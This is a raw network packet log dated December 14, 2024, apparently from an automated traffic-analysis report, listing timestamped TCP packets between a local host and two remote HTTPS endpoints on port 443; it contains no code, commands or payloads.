                                                                                                                                          Dec 14, 2024 14:00:24.465936899 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.465962887 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.466028929 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.466059923 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.466090918 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.466113091 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.585263014 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.585328102 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.585361958 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.585396051 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.585414886 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.585437059 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.591634989 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.591665983 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.591753960 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.591784000 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.591825008 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.599520922 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.599555969 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.599608898 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.599639893 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.599654913 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.599689007 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.604598045 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.604652882 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.604692936 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.604696989 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.604788065 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.608669043 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:41.107305050 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:41.107368946 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:41.107451916 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:41.108634949 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:41.108649969 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.417979002 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.418421984 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.423312902 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.423345089 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.423677921 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.439101934 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.479355097 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.871248960 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.871329069 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.871403933 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.871436119 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.871464968 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.871469975 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.871503115 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.871536970 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.871562004 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.879689932 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.888243914 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.888309002 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.888330936 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.934525967 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.934566021 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.979867935 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.991204023 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.042464972 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.042505026 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.067334890 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.067471027 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.067497015 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.076561928 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.076601982 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.076651096 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.076677084 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.076731920 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.084558010 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.092710972 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.092750072 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.092824936 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.092853069 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.092895985 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.100712061 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.108767033 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.108829021 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.108854055 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.116744995 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.116806984 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.116832972 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.124596119 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.124664068 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.124672890 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.132579088 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.132699013 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.132704973 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.145570993 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.145683050 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.145683050 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.145714045 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.145766020 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.152141094 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.198602915 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.255373955 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.257615089 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.257725954 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.257756948 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.264225006 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.264276028 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.264328957 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.264355898 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.264425039 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.273777962 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.273791075 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.273895979 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.282419920 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.282433033 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.282500029 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.286665916 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.286727905 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.295258999 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.295269966 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.295383930 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.299674034 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.299746037 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.308386087 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.308449030 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.317006111 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.317075968 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.325664997 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.325758934 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.329966068 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.330041885 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.338551044 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.338617086 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.342858076 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.342921019 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.351541996 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.351600885 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.447632074 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.447726965 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.449440002 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.449507952 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.456269979 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.456393003 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.462899923 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.462990046 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.469377995 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.469454050 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.472491026 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.472564936 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.478537083 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.478741884 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.481676102 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.481770039 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.487694025 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.487775087 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.493863106 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.493947983 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.499174118 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.499255896 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.502054930 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.502268076 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.507889986 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.508011103 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.513619900 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.513711929 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.518064022 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.518188000 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.521034956 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.521152973 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.526860952 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.526953936 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.532620907 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.532730103 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.538393974 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.538490057 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.541404963 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.541484118 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.547223091 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.547346115 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.552951097 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.553049088 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.556005001 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.556078911 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.567405939 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.567516088 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.571985960 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.572065115 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.574959993 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.575040102 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.579070091 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.579154015 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.640538931 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.640703917 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.651154041 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.651166916 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.651211023 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.651247978 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.651289940 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.651302099 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.651369095 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.663616896 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.663654089 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.663748980 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.663777113 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.663789988 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.663821936 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.677130938 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.677170038 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.677264929 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.677292109 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.677324057 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.678529024 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.690243006 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.690275908 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.690390110 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.690402985 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.690448999 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.697724104 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.697748899 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.697799921 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.697810888 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.697841883 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.697860003 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.705101013 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.705127954 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.705188990 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.705209017 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.705234051 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.705257893 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.711627960 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.711656094 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.711719036 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.711747885 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.711766958 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.711786032 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.831808090 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.831846952 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.831965923 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.831998110 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.832055092 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.838525057 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.838582993 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.838607073 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.838634968 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.838650942 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.838679075 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.844188929 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.844223976 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.844279051 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.844309092 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.844326019 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.844352007 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.850533009 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.850568056 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.850617886 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.850646973 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.850663900 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.850698948 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.856909037 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.856940031 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.856987953 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.857017040 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.857034922 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.857059002 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.862901926 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.862935066 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.863024950 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.863053083 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.863101006 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.869226933 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.869256020 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.869298935 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.869322062 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.869334936 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.869400024 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.874854088 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.874888897 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.874933004 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.874960899 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.874986887 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.874998093 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.024316072 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.024349928 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.024507999 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.024544954 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.024590969 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.030432940 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.030456066 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.030556917 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.030570030 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.030610085 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.036370039 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.036392927 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.036478043 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.036497116 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.036550999 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.042637110 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.042659998 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.042772055 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.042782068 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.042819023 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.048757076 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.048779964 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.048826933 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.048835993 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.048861027 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.048886061 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.054857016 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.054892063 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.054955006 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.054966927 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:44.054976940 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:44.055008888 CET49719443192.168.2.12104.21.84.67
